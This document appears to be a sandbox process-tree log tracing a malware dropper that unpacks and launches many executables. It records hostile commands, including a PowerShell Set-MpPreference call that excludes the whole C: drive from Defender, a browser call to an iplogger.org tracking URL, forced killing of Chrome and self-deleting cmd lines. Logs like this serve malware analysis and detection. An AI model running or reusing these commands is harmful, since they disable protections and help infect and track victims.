C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue09c1731fe55c7.exeTue09c1731fe55c7.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1368 -
C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue09c1731fe55c7.exeC:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue09c1731fe55c7.exe6⤵PID:1704
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue09c1731fe55c7.exeC:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue09c1731fe55c7.exe6⤵PID:2460
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09786995c7f02a923.exe4⤵
- Loads dropped DLL
PID:732 -
C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue09786995c7f02a923.exeTue09786995c7f02a923.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1144 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\9671362529.exe"6⤵PID:2792
-
C:\Users\Admin\AppData\Local\Temp\9671362529.exe"C:\Users\Admin\AppData\Local\Temp\9671362529.exe"7⤵PID:2988
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 5728⤵
- Program crash
PID:2208
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\6514788337.exe"6⤵PID:2968
-
C:\Users\Admin\AppData\Local\Temp\6514788337.exe"C:\Users\Admin\AppData\Local\Temp\6514788337.exe"7⤵PID:2892
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Tue09786995c7f02a923.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue09786995c7f02a923.exe" & exit6⤵PID:2324
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0947ef38552fc.exe4⤵PID:1388
-
C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue0947ef38552fc.exeTue0947ef38552fc.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1576 -
C:\Users\Public\run.exeC:\Users\Public\run.exe6⤵PID:1964
-
-
C:\Users\Public\run2.exeC:\Users\Public\run2.exe6⤵PID:2832
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/18tji77⤵PID:776
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:776 CREDAT:275457 /prefetch:28⤵PID:1212
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09792fda06e.exe4⤵PID:1880
-
C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue09792fda06e.exeTue09792fda06e.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1316
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue091e2054cef7.exe4⤵
- Loads dropped DLL
PID:820 -
C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue091e2054cef7.exeTue091e2054cef7.exe5⤵
- Executes dropped EXE
PID:1464 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Dzpafigaxd.vbs"6⤵PID:3008
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google\Qekdqa.exe'7⤵PID:2088
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dzpafigaxd.vbs"6⤵PID:2652
-
C:\Users\Admin\AppData\Local\Temp\Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe"C:\Users\Admin\AppData\Local\Temp\Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe"7⤵PID:2916
-
-
-
C:\Users\Admin\AppData\Local\Temp\MSBuild.exeC:\Users\Admin\AppData\Local\Temp\MSBuild.exe6⤵
- Loads dropped DLL
PID:1224
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09264824c4.exe4⤵PID:1588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0990c8b597f.exe4⤵
- Loads dropped DLL
PID:676 -
C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue0990c8b597f.exeTue0990c8b597f.exe5⤵PID:1392
-
C:\Users\Admin\AppData\Local\Temp\is-VALCU.tmp\Tue0990c8b597f.tmp"C:\Users\Admin\AppData\Local\Temp\is-VALCU.tmp\Tue0990c8b597f.tmp" /SL5="$10164,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue0990c8b597f.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:992 -
C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue0990c8b597f.exe"C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue0990c8b597f.exe" /SILENT7⤵PID:1972
-
C:\Users\Admin\AppData\Local\Temp\is-LDH2U.tmp\Tue0990c8b597f.tmp"C:\Users\Admin\AppData\Local\Temp\is-LDH2U.tmp\Tue0990c8b597f.tmp" /SL5="$20164,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue0990c8b597f.exe" /SILENT8⤵PID:2120
-
C:\Users\Admin\AppData\Local\Temp\is-EOIHF.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-EOIHF.tmp\postback.exe" ss19⤵PID:3036
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0956c36b51.exe /mixone4⤵PID:1224
-
C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue0956c36b51.exeTue0956c36b51.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:852 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Tue0956c36b51.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue0956c36b51.exe" & exit6⤵PID:2672
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Tue0956c36b51.exe" /f7⤵
- Kills process with taskkill
PID:2860
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue093cbcf0222440.exe4⤵
- Loads dropped DLL
PID:1408 -
C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue093cbcf0222440.exeTue093cbcf0222440.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1604 -
C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue093cbcf0222440.exe"C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue093cbcf0222440.exe" -u6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1460
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0971aafeebb6f.exe4⤵
- Loads dropped DLL
PID:1616 -
C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue0971aafeebb6f.exeTue0971aafeebb6f.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1944 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
- Loads dropped DLL
PID:460
-
-
-
-
-
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵PID:2928
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:564
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:2672
-
C:\Users\Admin\AppData\Local\Temp\7B77.exeC:\Users\Admin\AppData\Local\Temp\7B77.exe1⤵PID:1732
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"2⤵PID:2572
-
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵PID:3200
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3192
-
C:\Windows\system32\taskeng.exetaskeng.exe {AD2E904B-8F85-4A59-824F-DF93F150D055} S-1-5-21-2955169046-2371869340-1800780948-1000:UKNHJUQT\Admin:Interactive:[1]1⤵PID:3168
-
C:\Users\Admin\AppData\Roaming\ecjuhgfC:\Users\Admin\AppData\Roaming\ecjuhgf2⤵PID:3280
-
-
C:\Users\Admin\AppData\Roaming\ecjuhgfC:\Users\Admin\AppData\Roaming\ecjuhgf2⤵PID:3996
-
-
C:\Users\Admin\AppData\Roaming\ecjuhgfC:\Users\Admin\AppData\Roaming\ecjuhgf2⤵PID:3556
-